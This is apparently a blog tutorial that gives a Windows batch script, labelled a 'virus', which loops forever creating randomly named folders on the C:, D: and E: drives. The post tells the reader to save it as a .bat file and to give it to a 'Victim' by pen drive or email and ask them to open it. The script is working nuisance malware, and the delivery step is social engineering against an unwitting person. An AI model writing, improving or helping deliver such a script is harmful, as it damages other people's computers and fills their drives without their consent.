Making Simple Virus with notepad in windows

Here we are going to show, How to make Simple Virus in notepad. This virus will create Unlimited Folder in each drive. Let's Start.

[ Note : Don't try it on your computer ]

Step 1: Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]

Step 2 : Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM rbgozariya.com


Step 3: Now Give this file to Victim via Pen-drive or Mail then ask to Open it.

Post a Comment

➜ Your feedback is always important to us
➜ Do not post any spam comments here,it will be directly remove upon our review and .
➜ Don't add website URL in your comments.

 
Top